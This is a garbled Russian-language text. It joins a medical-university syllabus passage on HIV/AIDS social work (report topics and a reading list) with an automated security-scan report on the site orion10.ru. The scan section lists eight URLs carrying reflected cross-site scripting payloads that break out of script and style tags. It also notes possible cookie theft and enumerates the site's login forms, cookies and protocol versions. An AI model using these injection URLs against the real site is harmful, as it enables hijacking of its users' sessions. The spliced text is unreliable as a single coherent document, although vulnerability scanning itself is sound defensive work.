Возможные последствия

(каждый студент в течении цикла в обязательном порядке готовит реферативный доклад):

1.Технологии социально-медицинской работы с ВИЧ-инфицированными и больными СПИДом

2.Социально-медицинские проблемы ВИЧ-инфицированных и больных СПИДом

3.Нормативно-правовая база социально-медицинской работы с ВИЧ-инфицированными и больными СПИДом

4.Профилактическая медико-социальная работа с молодёжью

5. Социальная работа с ВИЧ-инфицированными несовершеннолетними

6.Социальный контроль за ВИЧ-инфицированными людьми

7.Дети и семьи ВИЧ- инфицированных.Психологические аспекты

8.Виды психосоциальной помощи при работе с ВИЧ-инфицированными

9.Эпидемиология и профилактика ВИЧ-инфекции

10.Этические и юридические проблемы СПИДА

8. Рекомендованная литература по теме занятия:

1.Артюнина Г.П. Основы социальной медицины: Учебное пособие для вузов. М.: Академический проект, 2009. - 576 с.

2.Социальная политика: Учебник / Под общ. ред. Н.А.Волгина. - М.: Издательство "Экзамен", 2009 год. - 736 с

3.Тен. Е.Е. Основы социальной медицины: Учебное пособие. - М. ФОРУМ: ИНФРА-М, 2007. - 256 с.

4.Технологии социальной работы: Учебник / Под общ.ред. проф.Е.И. Холостовой. - М.: ИНФРА-М, 2009. - 400с. С.121-144.

5.Холостова Е.И., Дементьева Н.Ф. Социальная реабилитация: Учебное пособие. 2-е изд. - М.: Издательско-торговая корпорация "Дашков и К°", 2008 - 340 с.

Электронные ресурсы:

1. ЭБС КрасГМУ "Colibris";

2. ЭБС Консультант студента;

3. ЭБС Университетская библиотека Online;

4. ЭНБ eLibrary

 

Возможные последствия

Злоумышленники могут внедрять JavaScript, VBScript, ActiveX, HTML код в уязвимое приложение, получать данные

пользователей. Например, злоумышленник может похитить cookies (куки). Кроме того, возможно изменять содержимое

страницы, представленное пользователю.

 

URL Уязвимостей

1. http://orion10.ru/index.php?page=2&action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=3&pricelt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000E3C)%3C/script%3E&str_search=3&vendor=3

2. http://orion10.ru/index.php?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=3&pricelt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000CA6)%3C/script%3E&str_search=3&vendor=3

3. http://orion10.ru/?page=2&action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x0008B1)%3C%2Fscript%3E&pricelt=3&str_search=3&vendor=3

4. http://orion10.ru/?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=3&pricelt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00061A)%3C/script%3E&str_search=3&vendor=3

5. http://orion10.ru/index.php?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000C9F)%3C/script%3E&pricelt=3&str_search=3&vendor=3

6. http://orion10.ru/request_search.php

7. http://orion10.ru/?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000616)%3C/script%3E&pricelt=3&str_search=3&vendor=3

8. http://orion10.ru/index.php?page=2&action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000E3B)%3C/script%3E&pricelt=3&str_search=3&vendor=3

 

Для защиты от данного типа атак необходимо тщательно фильтровать входные параметры.

--------------------------------------------------------------------------------------------------------------------------

 

Опасность утечки информации

 

Доступна информация

Список форм

Описание

Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.

Список форм:

POST / HTTP/1.1
dialler_login=&username=&password=&remember=

POST /page.php?faq HTTP/1.1
dialler_login=&username=&password=&remember=

POST /catalog.php?groupID=57 HTTP/1.1
dialler_login=&username=&password=&remember=

POST /service.php HTTP/1.1
dialler_login=&username=&password=&remember=

POST /?page=viewClientItems&orderID= HTTP/1.1
dialler_login=&username=&password=&remember=

 

 

Доступна информация

Список cookie

Описание

1. cookie_test=please_accept_cookie; expires=Thu, 13-Feb-2014 14:00:32 GMT; path=/; domain=orion10.ru
2. onpage=15; expires=Thu, 13-Feb-2014 05:00:32 GMT
3. pricelt=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
4. pricegt=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT

 

Доступна информация

Версии протоколов

Описание

Версии поддерживаемых протоколов:
1.99
2.0